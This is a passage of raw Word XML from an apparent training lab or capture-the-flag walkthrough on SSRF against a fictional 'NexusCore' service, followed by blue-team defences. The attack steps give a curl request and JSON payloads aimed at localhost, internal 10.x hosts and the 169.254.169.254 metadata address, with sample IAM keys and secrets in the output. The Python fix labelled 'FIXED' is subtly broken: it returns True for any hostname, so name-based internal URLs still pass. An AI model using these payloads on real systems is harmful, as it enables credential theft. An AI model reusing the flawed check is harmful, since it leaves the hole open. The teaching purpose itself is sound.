                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X POST http://localhost:7007/api/integrations/fetch \
  -H "Content-Type: application/json" \
  -b "ncx_token=YOUR_JWT" \
  -d '{"url":"http://127.0.0.1:7007/internal/metadata"}'</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Read the internal metadata — IAM credentials exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Response includes AWS-style IAM credentials:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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"AccessKeyId": "AKIA5NEXUSCORE2024X"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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"SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/NEXUSCORE_KEY"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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FLAG: NEXUSCORE{SSRF_metadata_service_compromised}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Also contains user-data with DB_PASS and JWT_SECRET!</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalate — read internal config file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Change URL to: http://127.0.0.1:7007/internal/config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Response returns config.json with: db_password, jwt_secret, admin_api_key, S3 bucket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Every internal service is now reachable — enumerate further: try /api/admin/users, /api/auth/me.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Full internal network scan via SSRF:
{"url": "http://127.0.0.1:7007/internal/config"}
{"url": "http://10.0.1.20:5432/"}         # prod DB
{"url": "http://10.0.1.25:6379/"}         # Redis
{"url": "http://169.254.169.254/latest/meta-data/"}  # Cloud metadata</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4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  Expected Result / FLAG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Access http://127.0.0.1:7007/internal/metadata via SSRF → capture IAM credentials and FLAG: NEXUSCORE{SSRF_metadata_service_compromised}. Bonus: read /internal/config for DB password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A7A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔵  BLUE TEAM — DEFENCE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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement URL allowlist — only trusted domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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The fix: reject any URL that is not in an approved list of external domains.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Never allow 127.0.0.1, 10.x.x.x, 192.168.x.x, 169.254.x.x, or localhost.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># FIXED — add to ssrf() route:
import ipaddress, urllib.parse
BAD_NETS = [ipaddress.ip_network(n) for n in
  ["127.0.0.0/8","10.0.0.0/8","172.16.0.0/12","192.168.0.0/16","169.254.0.0/16"]]
def is_safe_url(url):
    try:
        host = urllib.parse.urlparse(url).hostname
        if host in ["localhost","metadata.google.internal"]: return False
        ip = ipaddress.ip_address(host)
        return not any(ip in net for net in BAD_NETS)
    except: return True  # hostname — resolve and re-check
if not is_safe_url(url):
    return jsonify({"error": "Internal URLs not allowed"}), 403</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Move internal endpoints off the main server port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Internal endpoints (/internal/metadata, /internal/config) should not be on port 7007.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Run them on a separate internal-only port or process with firewall rules blocking external access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Use environment variables for secrets — never serve config files over HTTP.</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Use a dedicated SSRF-safe HTTP client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Libraries like "ssrf-sheriff" or custom resolvers block SSRF at the DNS level.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
